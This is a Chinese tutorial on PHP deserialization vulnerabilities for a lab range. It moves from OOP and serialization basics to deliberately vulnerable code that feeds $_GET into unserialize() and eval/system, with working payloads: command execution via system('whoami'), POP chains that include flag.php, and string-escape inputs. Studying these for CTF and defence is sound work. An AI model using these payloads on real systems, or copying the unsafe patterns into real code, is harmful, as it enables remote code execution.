PHP 反序列化
一、靶场部署
项目地址:php_ser_Class
Notice
作者推荐使用 Docker 的方式部署环境,这里以 phpstudy 的方式部署
1、直接将项目文件复制到 phpstudy 的网站根目录
2、访问 php_ser_Class 靶场目录
二、面向对向基本概念
面向过程
面向过程是一种以整体事件为中心的编程思想,编程的时候把解决问题的步骤分析出来,然后用函数把这些步骤实现,在一步一步的具体步骤中再按顺序调用函数。
面向对象
面向对象是一种以对象为中心的编程思想, 把要解决的问题分解成各个对象;对象是一个由信息及对信息进行处理的描述所组成的整体, 是对现实世界的抽象。
对象的三个特征:对象的行为、对象的形态、对象的表示
类的定义:类定义了一件事物的抽象特点,它将数据以及对这些数据的操作封装在一起。对象是具有类类型的变量,是对类的实例。
内部构成:成员属性 + 成员方法
成员属性:定义在类内部的变量。该变量的值对外是不可见的,但是可以通过成员函数访问,在类被实例化为对象后,该变量即可成为对象的属性。
成员方法:定义在类的内部,可用于访问对象的数据
继承:继承性是子类自动共享父类数据结构和方法的机制,是类之间的一种关系。在定义和实现一个类的时候,可以在一个已经存在的类的基础上进行,把一个己经存在的类所定义的内容作为自己的内容,并加入若干新的内容。
父类:一个类被其它类继承,可将该类称为父类、基类或超类。
子类:一个类继承其它类,可将该类称为子类或派生类。
三、类与对象
1、类的结构
类:定义类名、成员属性、成员方法
<?php
class Class_Name{
// 成员属性声明
// 成员方法声明
}
2、类的内容
创建一个类:
<?php
// 定义类 类名
class hero{
// 声明成员属性
var $name;
var $sex;
// 声明成员方法
function jineng($var1){
// 使用 $this 调用成员属性
echo $this->name;
echo $var1;
}
}
3、实例化和赋值
<?php
class hero{
var $name;
var $sex;
function jineng($var1){
echo $this->name;
echo $var1;
}
}
// 实例化类 hero 为 对象 cyj
$cyj = new hero();
// 参数赋值
$cyj->name = "chengyaojin";
$cyj->sex = "man";
// 调用函数
$cyj->jineng("zuofan");
// 打印对象 cyj
print_r($cyj);
运行结果:
chengyaojin
zuofan
hero Object
(
[name] => chengyaojin
[sex] => man
)
4、类的修饰符介绍
在类中直接声明的变量你为成员属性(也可以称为成员变量)。
可以在类中声明多个变量,即对象中可以有多个成员属性,每个变量都存储了对象不同的属性信息。
访问权限修饰符:对属性的定义
public:公共的,在类的内部、子类和类的外部都可以访问。
protected:受保护的,在类的内部和子类中可以访问,但不能在类的外部访问。
private:私有的,只能在类的内部访问,在类的外部和子类中都不能访问。
访问权限修饰符 | 类的内部 | 子类 | 类的外部 |
---|---|---|---|
public | √ | √ | √ |
protected | √ | √ | × |
private | √ | × | × |
<?php
class hero{
public $name = "chengyaojin";
private $sex = "man";
protected $shengao = "165";
function jineng($var1){
echo $this->name;
echo $var1;
}
}
$cyj = new hero();
echo $cyj->name;
echo $cyj->sex;
echo $cyj->shengao;
运行结果:
chengyaojin
Fatal error: Uncaught Error: Cannot access private property hero::$sex in D:\Workspace\php\new_star_ctf_2024\md5.php:15 Stack trace: #0 {main} thrown in D:\Workspace\php\new_star_ctf_2024\md5.php on line 15
<?php
class hero{
public $name = "chengyaojin";
private $sex = "man";
protected $shengao = "165";
function jineng($var1){
echo $this->name;
echo $var1;
}
}
class hero2 extends hero{
function test(){
echo $this->name;
echo $this->sex;
echo $this->shengao;
}
}
$cyj = new hero();
$cyj2 = new hero2();
echo $cyj->name;
echo $cyj2->test();
运行结果:
chengyaojin
chengyaojin
Warning: Undefined property: hero2::$sex in D:\Workspace\php\new_star_ctf_2024\md5.php on line 16
165
5、类与对象
类是对象的抽象,而对象是类的具体实例
类是想法,把类实例化(new),调用具体值后就变成了对象
6、类的成员方法
在类中定义的函数被称为成员方法
函数实现的是某个独立的功能
成员方法实现的是类中的一个行为,是类的一部分
可以在类中声明多个成员方法,成员方法的声明和函数声明完全一样,只不过在声明成员方法时可以在 function 关键字前加一些访问权限修饰符,如 public、protected、private(可以省略,默认为 public)
四、序列化基础知识
1、序列化的作用
序列化(Serialization) 是将对象的状态信息(属性)转换为可以存储或传输的形式的过程
对象 —序列化—> 字符串: 将对象或数组转化为可存储/传输的字符串
2、表达方式
<?php
$a = null;
echo serialize($a);
?>
所有格式第一位都是数据类型的英文字母的简写。
数据类型 | 原始数据 | 序列化字符串 |
---|---|---|
NULL | null | N; |
int | 666 | i:666; |
double | 66.6 | d:66.6; |
Boolean | true | b:1; |
Boolean | false | b:0; |
string | “benben” | s:6:“benben”; |
数组的序列化:
<?php
$a = array("benben", "dazhuang", "laoliu");
var_dump($a);
echo serialize($a);
运行结果:
array(3) {
[0]=>
string(6) "benben"
[1]=>
string(8) "dazhuang"
[2]=>
string(6) "laoliu"
}
a:3:{i:0;s:6:"benben";i:1;s:8:"dazhuang";i:2;s:6:"laoliu";}
对象的序列化:
不能序列化类,只能序列化对象
只序列化成员变量,不序列化成员函数
<?php
class test{
public $pub = "benben";
function jineng(){
echo $this->pub;
}
}
$a = new test();
echo serialize($a);
运行结果:
O:4:"test":1:{s:3:"pub";s:6:"benben";}
私有属性(private)序列化时在变量名前添加 %00Class_Name%00
<?php
class test{
private $pub = "benben";
function jineng(){
echo $this->pub;
}
}
$a = new test();
echo serialize($a);
echo urlencode(serialize($a));
运行结果:
O:4:"test":1:{s:9:" test pub";s:6:"benben";}
O%3A4%3A%22test%22%3A1%3A%7Bs%3A9%3A%22%00test%00pub%22%3Bs%3A6%3A%22benben%22%3B%7D
受保护属性(protected)序列化时在变量名前添加 %00*%00
<?php
class test{
protected $pub = "benben";
function jineng(){
echo $this->pub;
}
}
$a = new test();
echo serialize($a);
echo urlencode(serialize($a));
运行结果:
O:4:"test":1:{s:6:" * pub";s:6:"benben";}
O%3A4%3A%22test%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00pub%22%3Bs%3A6%3A%22benben%22%3B%7D
实例化后的对象作为成员属性
<?php
class test{
public $pub = "benben";
function jineng(){
echo $this->pub;
}
}
class test2{
public $ben;
function __construct(){
$this->ben = new test();
}
}
$a = new test2();
echo serialize($a);
<?php
class test{
public $pub = "benben";
function jineng(){
echo $this->pub;
}
}
class test2{
public $ben;
}
$a = new test2();
$a->ben = new test();
echo serialize($a);
运行结果:
O:5:"test2":1:{s:3:"ben";O:4:"test":1:{s:3:"pub";s:6:"benben";}}
五、反序列化知识
- 反序列化之后的内容为一个对象;
- 反序列化生成的对象的值,由反序列化里的值提供,与原有类与定义的值无关
- 反序列化不触发类的成员方法,需要调用方法后才能触发
反序列化的作用: 将序列化后的参数还原成实例化的对象
对象 —序列化—> 字符串
字符串 —反序列化—> 对象
- 反序列化生成的对象里的值,由反序列化里的值提供,与原有类与定义的值无关
- 反序列化不改变类的成员方法,需要调用方法后才能触发
<?php
class test{
public $a = "benben";
protected $b = 666;
private $c = false;
public function displayVar(){
echo $this->a;
}
}
$d = new test();
$d = serialize($d);
$a = urlencode($d);
echo $a;
$b = unserialize(urldecode($a));
var_dump($b);
运行结果:
O%3A4%3A%22test%22%3A3%3A%7Bs%3A1%3A%22a%22%3Bs%3A6%3A%22benben%22%3Bs%3A4%3A%22%00%2A%00b%22%3Bi%3A666%3Bs%3A7%3A%22%00test%00c%22%3Bb%3A0%3B%7D
object(test)#1 (3) {
["a"]=>
string(6) "benben"
["b":protected]=>
int(666)
["c":"test":private]=>
bool(false)
}
Notice
#1
是这个对象在当前运行时环境中的唯一 ID 编号,是对象句柄 ID(object handle ID),它是 PHP 在输出调试信息时为了区分多个对象所生成的编号
六、反序列化漏洞利用例题
反序列化漏洞的成因:
反序列化过程中,unserialize() 接收的值(字符串)可控,通过更改这个值,得到所需的代码,即生成的对象的属性值
通过调用方法,触发代码执行
<?php
class test{
public $a = 'echo "this is test!!";';
public function displayVar() {
eval($this->a);
}
}
$get = $_GET["benben"];
$b = unserialize($get);
$b->displayVar();
构造 payload:O:4:"test":1:{s:1:"a";s:17:"system("whoami");";}
<?php
class test{
public $a = 'system("whoami");';
}
$get = new test();
echo serialize($get);
运行结果:
win-1iljbo80gej\administrator
七、魔术方法
魔术方法: 一个预定义好的,在特定情况下自动触发的行为方法
1、魔术方法的作用
魔术方法在特定条件下自动调用相关方法,最终导致触发代码
- __construct(),类的构造函数
- __destruct(),类的析构函数
- __call(),在对象中调用一个不可以访问的方法
- __callStatic(),用静态方式调用一个不可以访问的方法
- __get(),访问一个不可以访问的类的成员属性时调用
- __isset(),对不可访问属性调用 isset() 或 empty()
- __set(),设置一个不可访问的类的成员属性
- __unset(),对不可访问属性调用 unset()
- __sleep(),执行 serialize() 时,会先调用这个函数
- __wakeup(),执行 unserialize() 时,会先调用这个函数
- __toString(),类被作为字符串
- __invoke(),类被作为函数调用
- __set_state(),调用 var_export() 导出类时,此静态方法被调用
- __clone(),当对象调用 clone() 复制完成时
- __autoload(),尝试加载未定义的类
- __debugInfo(),打印所需调试信息
2、魔术方法相关机制
- 触发时机(动作不同,触发的魔术方法也不同)
- 功能
- 参数(一些特殊魔术方法需要传参)
- 返回值
3、__construct()
构造函数,在实例化一个对象的时候,首先会去自动执行的一个方法
实例化对象时触发构造函数 __construct()
<?php
class User {
public $username;
public function __construct($username) {
$this->username = $username;
echo "触发了 1 次构造函数";
}
}
$test = new User("benben");
$ser = serialize($test);
unserialize($ser);
运行结果:
触发了 1 次构造函数
4、__destruct()
析构函数,在对象的所有引用被删除或当对象被显式销毁时执行的魔术方法
实例化对象结束后,代码运行完会销毁,触发析构函数 __destruct()
<?php
class User {
public function __destruct()
{
echo "触发了析构函数1次"."<br />" ;
}
}
$test = new User("benben");
$ser = serialize($test);
unserialize($ser);
5、析构函数例题
<?php
highlight_file(__FILE__);
error_reporting(0);
class User {
var $cmd = "echo 'dazhuang666!!';" ;
public function __destruct()
{
eval ($this->cmd);
}
}
$ser = $_GET["benben"];
unserialize($ser);
构造 payload:O:4:"User":1:{s:3:"cmd";s:17:"system('whoami');";}
<?php
class User {
var $cmd = "system('whoami');";
}
$ser = new User();
echo serialize($ser);
运行结果:
win-1iljbo80gej\administrator
6、__sleep()
序列化 serialize() 函数会检查类中是否存在魔术方法 __sleep(),如果存在则该方法会先被调用,然后执行序列化操作。此魔术方法可以用于清理对象并返回一个包含对象中所有应被序列化的变量名称的数组。
Error
如果该方法未返回任何内容,则 NULL 被序列化并产生一个 E_NOTICE 级别的错误。
示例代码:
<?php
class User {
const SITE = 'uusama';
public $username;
public $nickname;
private $password;
public function __construct($username, $nickname, $password) {
$this->username = $username;
$this->nickname = $nickname;
$this->password = $password;
}
public function __sleep() {
return array('username', 'nickname');
}
}
$user = new User('a', 'b', 'c');
echo serialize($user);
运行结果:
O:4:"User":2:{s:8:"username";s:1:"a";s:8:"nickname";s:1:"b";}
7、__sleep() 例题
示例代码:
<?php
class User {
const SITE = 'uusama';
public $username;
public $nickname;
private $password;
public function __construct($username, $nickname, $password) {
$this->username = $username;
$this->nickname = $nickname;
$this->password = $password;
}
public function __sleep() {
system($this->username);
}
}
$cmd = $_GET['benben'];
$user = new User($cmd, 'b', 'c');
echo serialize($user);
构造参数:?benben=whoami
运行结果:
win-1iljbo80gej\administrator N;
8、__wakeup()
反序列化 unserialize() 函数会检查是否存在一个 __wakeup() 方法,如果存在则会先调用 __wakeup() 方法预先准备对象需要的资源,常用于反序列化操作中重新建立数据库连接或执行其他初始化操作。
示例代码:
<?php
class User {
const SITE = 'uusama';
public $username;
public $nickname;
private $password;
private $order;
public function __wakeup() {
$this->password = $this->username;
}
}
$user_ser = 'O:4:"User":2:{s:8:"username";s:1:"a";s:8:"nickname";s:1:"b";}';
var_dump(unserialize($user_ser));
运行结果:
object(User)#1 (4) {
["username"]=>
string(1) "a"
["nickname"]=>
string(1) "b"
["password":"User":private]=>
string(1) "a"
["order":"User":private]=>
NULL
}
9、__wakeup() 例题
示例代码:
<?php
class User {
const SITE = 'uusama';
public $username;
public $nickname;
private $password;
private $order;
public function __wakeup() {
system($this->username);
}
}
$user_ser = $_GET['benben'];
unserialize($user_ser);
?>
构造 payload:
O%3A4%3A%22User%22%3A4%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22whoami%22%3Bs%3A8%3A%22nickname%22%3BN%3Bs%3A14%3A%22%00User%00password%22%3BN%3Bs%3A11%3A%22%00User%00order%22%3BN%3B%7D
<?php
class User {
const SITE = 'uusama';
public $username;
public $nickname;
private $password;
private $order;
public function __wakeup() {
system($this->username);
}
}
$user_ser = new User();
$user_ser->username = 'whoami';
echo urlencode(serialize($user_ser));
运行结果:
win-1iljbo80gej\administrator
10、__toString()
当一个对象被当作字符串使用时自动调用
示例代码:
<?php
class User {
var $benben = "this is test!!";
public function __toString()
{
return '格式不对,输出不了!';
}
}
$test = new User() ;
print_r($test);
echo "<br />";
echo $test;
运行结果:
User Object
(
[benben] => this is test!!
)
格式不对,输出不了!
11、__invoke()
当对象像函数一样被调用时自动触发
示例代码:
<?php
class User {
var $benben = "this is test!!";
public function __invoke()
{
echo '它不是个函数!';
}
}
$test = new User() ;
echo $test ->benben;
echo "<br />";
echo $test();
运行结果:
this is test!!
它不是个函数!
12、__call()
当对象调用未定义的普通方法时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 试图调用的未定义方法名 |
$arguments | array | 传给这个方法的参数数组(顺序保持不变) |
示例代码:
<?php
class User {
public function __call($arg1,$arg2)
{
echo "$arg1,$arg2[0]";
}
}
$test = new User() ;
$test -> callxxx('a');
运行结果:
callxxx,a
13、__callStatic()
当类调用未定义的静态方法时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 试图调用的未定义方法名 |
$arguments | array | 传给这个方法的参数数组(顺序保持不变) |
示例代码:
<?php
class User {
public static function __callStatic($arg1,$arg2)
{
echo "$arg1,$arg2[0]";
}
}
$test = new User() ;
$test::callxxx('a');
运行结果:
callxxx,a
14、__get()
当尝试访问一个未定义或不可访问的属性(如 private 或 protected)时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 试图访问的属性名 |
示例代码:
<?php
class User {
public $var1;
public function __get($arg1)
{
echo $arg1;
}
}
$test = new User() ;
$test ->var2;
运行结果:
var2
15、__set()
尝试给一个未定义或不可访问(如 private/protected)的属性赋值时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 试图访问的属性名 |
$arguments | mixed | 赋给该属性的值 |
示例代码:
<?php
class User {
public $var1;
public function __set($arg1 ,$arg2)
{
echo $arg1.','.$arg2;
}
}
$test = new User() ;
$test ->var2=1;
运行结果:
var2,1
16、__isset()
当对一个未定义或不可访问的属性使用 isset() 或 empty() 时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 被检查是否存在的属性名 |
示例代码:
<?php
class User {
private $var;
public function __isset($arg1 )
{
echo $arg1;
}
}
$test = new User() ;
isset($test->var);
运行结果:
var
17、__unset()
当对一个对象的未定义或不可访问(如 private/protected)属性 使用 unset() 操作(销毁指定变量)时触发
参数 | 类型 | 说明 |
---|---|---|
$name | string | 被 unset 的属性名 |
示例代码:
<?php
class User {
private $var;
public function __unset($arg1 )
{
echo $arg1;
}
}
$test = new User() ;
unset($test->var);
运行结果:
var
18、__clone()
当使用 clone 关键字克隆一个对象时触发
Notice
clone 默认是浅拷贝,属性是值类型(如字符串、数字)时复制值,属性是对象类型时只复制引用,所以可以用 __clone() 来实现深拷贝。
示例代码:
<?php
class User {
private $var;
public function __clone( )
{
echo "__clone test";
}
}
$test = new User() ;
$newclass = clone($test);
运行结果:
__clone test
八、POP 链
1、POP 链基础前置知识 1
示例代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
class index {
private $test;
public function __construct(){
$this->test = new normal();
}
public function __destruct(){
$this->test->action();
}
}
class normal {
public function action(){
echo "please attack me";
}
}
class evil {
var $test2;
public function action(){
eval($this->test2);
}
}
unserialize($_GET['test']);
构造 payload:
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%22whoami%22%29%3B%22%3B%7D%7D
<?php
class index {
private $test;
public function __construct(){
$this->test = new evil();
}
}
class evil {
var $test2 = 'system("whoami");';
}
$i = new index();
echo urlencode(serialize($i));
运行结果:
win-1iljbo80gej\administrator
2、POP 链基础前置知识 2
示例代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
class index {
private $test;
public function __construct(){
$this->test = new normal();
}
public function __destruct(){
$this->test->action();
}
}
class normal {
public function action(){
echo "please attack me";
}
}
class evil {
var $test2;
public function action(){
eval($this->test2);
}
}
unserialize($_GET['test']);
?>
构造 payload:
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%22whoami%22%29%3B%22%3B%7D%7D
<?php
class index {
private $test;
public function __construct(){
$this->test = new evil();
$this->test->test2 = 'system("whoami");';
}
}
class evil {
var $test2;
}
echo urlencode(serialize(new index()));
运行结果:
win-1iljbo80gej\administrator
3、POP 链构造及 POC 构造
题目代码:
<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class Modifier {
private $var;
public function append($value)
{
include($value);
echo $flag;
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
echo $this->source;
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
unserialize($_GET['pop']);
}
?>
构造 payload:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D
<?php
class Modifier {
private $var = "flag.php";
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
}
$show = new Show();
$test = new Test();
$modifier = new Modifier();
$show->source = $show;
$show->str = $test;
$test->p = $modifier;
echo urlencode(serialize($show));
运行结果:
ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}
九、字符串逃逸
1、前置知识
反序列化分隔符:PHP 在反序列化时,语法是以 ;
作为字段的分隔,以 }
作为结尾,在结束符 }
之后的任何内容不影响正常的反序列化
内容判断:根据长度判断内容,"
属于字符还是格式符号,是由字符串长度 4
来判断的
'O:6:"people":2:{s:4:"name";s:4:"Bo"b";s:3:"age";s:2:"20";}
注意:成员属性数量、名称长度、内容长度一致
示例代码:
<?php
// 成员属性数量不对
$b = 'O:1:"A":1:{s:2:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($b));
// 名称长度不对
$b = 'O:1:"A":2:{s:22:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($b));
运行结果:
bool(false)
bool(false)
示例代码:
<?php
class A{
public $v1 = "a";
}
echo serialize(new A());
$a = 'O:1:"A":2:{s:2:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($a));
运行结果:
O:1:"A":1:{s:2:"v1";s:1:"a";}
object(A)#1 (2) {
["v1"]=>
string(1) "a"
["v2"]=>
NULL
}
字符串逃逸:开发者先将对象序列化,然后将序列化后的敏感字符进行过滤或替换,最后再进行反序列化,这个时候就有可能会产生PHP反序列化字符逃逸的漏洞
- 字符串减少
O:4:"user":1:{s:8:"username";s:5:"admin";} --> O:4:"user":1:{s:8:"username";s:5:"hack";}
- 字符串增多
O:4:"user":1:{s:8:"username";s:5:"admin";} --> O:4:"user":1:{s:8:"username";s:5:"hacker";}
2、字符串逃逸-减少
示例代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($name){
$safe=array("flag","php");
$name=str_replace($safe,"hk",$name);
return $name;
}
class test{
var $user;
var $pass;
var $vip = false ;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
}
$param=$_GET['user'];
$pass=$_GET['pass'];
$param=serialize(new test($param,$pass));
$profile=unserialize(filter($param));
if ($profile->vip){
echo file_get_contents("flag.php");
}
?>
构造参数:?user=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp&pass=;s:4:"pass";N;s:3:"vip";b:1;}
运行结果:
<!--?php
/*
* # -*- coding: utf-8 -*-
* # @Author: benben
* # @link: https://ctfstu.com
*
* */
$flag = 'ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}';
-->
3、字符串逃逸-增多
示例代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($name){
$safe=array("flag","php");
$name=str_replace($safe,"hack",$name);
return $name;
}
class test{
var $user;
var $pass='daydream';
function __construct($user){
$this->user=$user;
}
}
$param=$_GET['param'];
$param=serialize(new test($param));
$profile=unserialize(filter($param));
if ($profile->pass=='escaping'){
echo file_get_contents("flag.php");
}
?>
构造参数:?param=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}
<!--?php
/*
* # -*- coding: utf-8 -*-
* # @Author: benben
* # @link: https://ctfstu.com
*
* */
$flag = 'ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}';
-->